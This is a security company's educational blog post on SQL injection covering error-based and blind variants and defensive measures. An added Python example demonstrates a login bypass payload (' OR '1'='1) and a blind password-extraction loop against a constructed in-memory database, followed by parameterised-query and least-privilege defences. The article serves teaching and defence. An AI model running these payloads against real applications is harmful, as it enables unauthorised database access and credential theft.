
SQL INJECTION

The 14 most common cybercrimes

Marina Córdoba Poveda // 1 November 2018


2nd PART


At R3 CyberSecurity we are covering the most recurrent cybercrimes that organisations and users face and how they can be prevented. To that end we have compiled the 14 most frequent cyber attacks you should be aware of in order to prevent them, split into two parts of 7 cybercrimes each. A new installment is published every week.

Day after day there are still cases of information theft, in SMEs and large companies alike. British Airways is the latest victim of cybercriminals exploiting vulnerabilities for profit.

For this reason, R3 CyberSecurity brings you another installment of the 14 most common Internet cybercrimes. If you have not read the first installment, on ransomware, I invite you to read it. Today's installment covers SQL injection, the most common attack used to gain access to databases.

SQL

To talk about SQL we must first mention databases. A database is an organised collection of data, managed by a database management system and structured into fields, records and tables so that the pieces of data that are needed can be selected quickly.

SQL (Structured Query Language) is the language used to query and manage the data held in relational databases. Unlike many programming languages, it is not hard to read and understand, even for inexperienced users.

SQL INJECTION

What is it?

SQL injection is a code injection technique that exploits a vulnerability in an application to gain access to the database behind it, making it possible to modify, delete or extract all of the information it holds.

The attack consists of "injecting" SQL fragments through the input parameters of an HTTP request (form fields, URL parameters, cookies or headers) that the application concatenates into a query. Because the database cannot tell the attacker's text apart from the query around it, that text is executed as SQL and can expose the entire database.

It is worth noting that this is one of the most common attacks because it is easy to carry out and because tools such as SQLMap automate it end to end. These factors make the number of such attacks grow year after year.

What types of SQL injection attacks are there?

Within this attack we can find the following variants:

Classic (error-based) SQL injection: the web application returns a database error for a given field when a single quote (') is entered. The error confirms that the input reaches the query unescaped, and from there the attacker can begin modifying the statement.

Blind SQL injection: the web application shows neither an error nor any data when the malformed SQL statement is executed. The attacker must instead submit a series of tests and infer the answer from differences in the response (a different page, or a delayed response when a time condition is injected), for instance to discover table and column names before acting.
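Both variants above, as an added example that is not part of the original article: a small Python script against an in-memory SQLite database holding a constructed users table (the names and passwords are made up for the demonstration). The login function pastes request parameters straight into the SQL text, which is the defect; the script then shows the single-quote probe producing a database error (the error-based signal), the classic always-true bypass, and a boolean-based blind extraction of a password one character at a time using nothing but the login's success or failure.

```python
import sqlite3

# Constructed sample data for this demonstration (not taken from the article).
USERS = [
    (1, "alice", "s3cret!"),
    (2, "bob", "hunter2"),
]


def make_db():
    """In-memory SQLite database standing in for the web application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def vulnerable_login(conn, name, password):
    """The injectable pattern: request parameters are pasted into the SQL text,
    so the database cannot distinguish the data from the code around it.
    Returns the matched user's name, or None when the login fails."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def probe_with_quote(conn):
    """Classic (error-based) injection starts with a single quote: it unbalances
    the string literal and the database rejects the statement. An application
    that echoes this error tells the attacker the field is injectable."""
    try:
        vulnerable_login(conn, "alice'", "x")
        return None          # no error: this field is not injectable this way
    except sqlite3.OperationalError as e:
        return str(e)        # the database's syntax error, leaked to the client


def bypass_login(conn):
    """Always-true condition in the password field: the WHERE clause becomes
    ... AND password = 'x' OR '1'='1', which every row satisfies, so the
    first user in the table is logged in without a password."""
    return vulnerable_login(conn, "nobody", "x' OR '1'='1")


def blind_extract_password(conn, target, max_len=32):
    """Boolean-based blind injection. The application only reveals whether the
    login succeeded (no error text, no data), but a crafted condition ties that
    single bit to one character of the target's password, so the password is
    recovered one character at a time. The trailing -- comments out the
    closing quote that the application appends."""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!?_-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = (f"x' OR (name = '{target}' AND "
                       f"SUBSTR(password, {pos}, 1) = '{ch}') --")
            if vulnerable_login(conn, target, payload) is not None:
                recovered += ch
                break
        else:
            break   # no character matched: end of the password reached
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("probe error :", probe_with_quote(db))
    print("bypass      :", bypass_login(db))
    print("blind read  :", blind_extract_password(db, "alice"))
```

The extraction loop costs one request per candidate character per position, which is exactly the tedious part that tools such as SQLMap automate; the application under attack never shows an error or a row of data, only a successful or failed login.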

HOW DOES THE ATTACK WORK?

[Infographic: how a SQL injection attack unfolds]

PROTECTION MEASURES


With this kind of attack it is very difficult to know you have been hit until it is too late: unless the application logs its queries and errors, you usually only find out once the database has already been modified or stolen.

So the best way to deal with these attacks is prevention. R3 CyberSecurity therefore offers the following tips:

Escape or reject special characters in anything that reaches the SQL database. The characters most often used to break out of a query are the single and double quote, the backslash (\) and the NUL byte (\x00); input containing them should be escaped by the database driver or rejected outright, never passed through as-is.

Use single quotes, but do not rely on them. Wrapping a value in single quotes, as in SELECT name FROM users WHERE id_user = '$id', is better than inserting it bare, but it is not secure on its own: if $id can itself contain a quote, the attacker simply closes the string and continues writing SQL. The reliable form of this advice is to use parameterised queries (prepared statements), where the value is sent separately from the statement and is never interpreted as part of it.

Grant the application's database user the minimum privileges. It is obvious advice, but you should never connect as root or any other administrative user with full access to all databases. Doing so makes the cybercriminal's work much easier, because a single injection point then reaches everything the account can touch.

Validate the data the user enters. In PHP this can be done with functions such as ctype_digit() for numbers or ctype_alpha() for letters, and by checking the length of each value. Reject anything that fails validation rather than trying to clean it up.
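The protection measures above, as an added example that is not part of the original article, in Python against an in-memory SQLite database with constructed sample users. It covers the three tips that translate directly into code: a parameterised query in place of hand-quoted string building, input validation in the spirit of ctype_digit() with a length limit, and least privilege. SQLite has no user accounts, so an authorizer callback that permits only read operations is used here to model a database account granted SELECT only; on MySQL or PostgreSQL the equivalent is a dedicated account with a narrow GRANT.

```python
import re
import sqlite3

# Constructed sample data for this demonstration (not taken from the article).
USERS = [(1, "alice", "s3cret!"), (2, "bob", "hunter2")]


def make_db():
    """In-memory SQLite database standing in for the web application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def safe_login(conn, name, password):
    """Parameterised query. The SQL text is fixed and the values are sent
    separately, so a quote or an OR in the input is only data, never syntax."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?", (name, password)
    ).fetchone()
    return row[0] if row else None


def validate_user_id(raw, max_len=10):
    """Input validation in the spirit of ctype_digit(): accept only a short
    string of ASCII digits and convert it to an int. Returns None on rejection."""
    if not isinstance(raw, str) or not re.fullmatch(r"[0-9]{1,%d}" % max_len, raw):
        return None
    return int(raw)


def lookup_by_id(conn, raw_id):
    """Validate first, then still bind the value as a parameter (defence in depth)."""
    uid = validate_user_id(raw_id)
    if uid is None:
        return None
    row = conn.execute("SELECT name FROM users WHERE id = ?", (uid,)).fetchone()
    return row[0] if row else None


def restrict_to_select(conn):
    """Least privilege, SQLite style. A real deployment gives the web application
    a database account holding only the grants it needs (typically SELECT on its
    own tables, never a root or superuser account). SQLite has no accounts, so an
    authorizer callback that permits only read operations models that account:
    any other operation is refused when the statement is prepared."""
    allowed = {sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ}

    def authorizer(action, arg1, arg2, db_name, trigger_or_view):
        return sqlite3.SQLITE_OK if action in allowed else sqlite3.SQLITE_DENY

    conn.set_authorizer(authorizer)


def try_statement(conn, sql):
    """Run a statement and report whether the database account allowed it."""
    try:
        conn.execute(sql)
        return "allowed"
    except sqlite3.DatabaseError as e:
        return f"denied: {e}"


if __name__ == "__main__":
    db = make_db()
    print(safe_login(db, "nobody", "x' OR '1'='1"))             # None: payload is just data
    print(lookup_by_id(db, "2"), lookup_by_id(db, "1 OR 1=1"))  # bob None
    restrict_to_select(db)
    print(try_statement(db, "UPDATE users SET password = 'pwned'"))
```

Note the order in lookup_by_id: validation narrows the input to what the application expects, and the parameter binding guarantees that whatever survives validation is still treated as a value. Neither replaces the other, and the read-only account limits the damage if both are ever bypassed.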

Marina Córdoba Poveda | Digital Marketing Assistant at R3 CyberSecurity


© R3 CyberSecurity